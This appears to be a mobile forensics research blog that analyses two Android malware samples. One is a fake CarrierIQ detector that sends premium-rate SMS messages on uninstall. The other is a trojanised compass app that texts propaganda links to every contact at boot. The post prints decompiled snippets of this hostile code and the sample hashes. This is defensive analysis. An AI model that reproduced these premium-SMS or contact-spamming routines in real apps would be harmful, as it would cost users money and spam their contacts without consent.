mobile phone forensics and mobile malware
Over the last few weeks we did a lot of research and development in the filed of mobile malware analysis. As a result, the new and improved Mobile-Sandbox is now online. Over the next few weeks, we are trying to implement some more features, so stay tuned!
Intro: What is Android.Qicsomos?
Android.Qicsomos is a new Android malware that emerged some days ago. It sends SMS messages to premium rated numbers.
Analysis of the Application and Its Structure
The app requests the following permissions:
After the application has been installed successfully, the icon of the app shows up in the dashboard. The name of the application and the UI look like an app for detecting CarrierIQ.
The Malicious Parts:
The malicious part of the app starts, when an user hits the “Déinstaller” button. The app sends four SMS messages to “81168” containing the text “AT37”, “MC49”, “SP99” and “SP93” before it gets deinstalled. (for more information see the following code-snippet)
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try{
label15: localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
try{
label26: localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
try{
label37: localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
label48: Intent localIntent = new Intent("android.intent.action.DELETE", Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
...
Sample Information:
sha256:
79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4
md5:
69b9691a8274a17cdc22e9681b3e1c74
We published and presented the paper “Forensic Acquisition of Location Data from Android Smartphones” at the IFIP WG11.9 conference in January this year. This paper covers the forensic acquisition of location data from Android smartphones (system and applications) and the corresponding generation of movement profiles. It will be published in the upcoming edition of “Advances in Digital Forensics”.
Today, we got the great message that two of our papers “Analyse und Vergleich von BckR2D2-I und II” and “Forensic Analysis of YAFFS2” had been accepted for the Sicherheit2012 in Darmstadt.
We are really looking forward to participate.
Intro: What is Android.Arspam?
Android.Arspam is a new Android malware threat that emerged some days ago and uses a trojanised version of a Islamic compass application to distribute political propaganda links. This malware represent the first stage of politically-motivated hacking (hacktivism) on mobile platforms.
Analysis of the Application and Its Structure
The app requests the following permissions:
When the app has been installed successfully, the icon of the original app shows up in the dashboard. The UI and functionality have also been duplicated from the original app.
The malicious part of this application consists of the following two main classes which will be analyzed in detail afterwards:
Analysis of arRabi
This class checks if the boot-process of the smartphone has completed and starts the malicious alArabiyyah service afterwards:
if ("android.intent.action.BOOT_COMPLETED".equals(paramIntent.getAction()){
paramContext.startService(new Intent(paramContext, alArabiyyah.class));
}
Analysis of alArabiyyah
This application starts a service called alArabiyyah, which sends an SMS to every contact in the address book with a link to one of the following 18 forum sites in the message:
Additionally, if the inserted SIM is from Bahrain, the application attempts to download a PDF file of the Bahrain Independent Commission of Inquiry (see the following code-snipet).
if (((TelephonyManager)getSystemService("phone")).getSimCountryIso() == "BH"){
URL localURL = new URL("http://www.alwasatnews.com/data/2011/3382/BICIreportAR.pdf");
HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
localHttpURLConnection.setRequestMethod("GET");
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.connect();
File localFile1 = Environment.getExternalStorageDirectory();
File localFile2 = new File(localFile1, "BICIreportAR.pdf");
localFileOutputStream = new FileOutputStream(localFile2);
localFile2.toString();
localInputStream = localHttpURLConnection.getInputStream();
localHttpURLConnection.getContentLength();
arrayOfByte = new byte[1024];
}
Sample Information:
sha256:
1d22924bbe5dce7696e18d880482b63ce19ca0746f8671aaec865cce143f6e6f
md5:
e7584031896cb9485d487c355ba5e545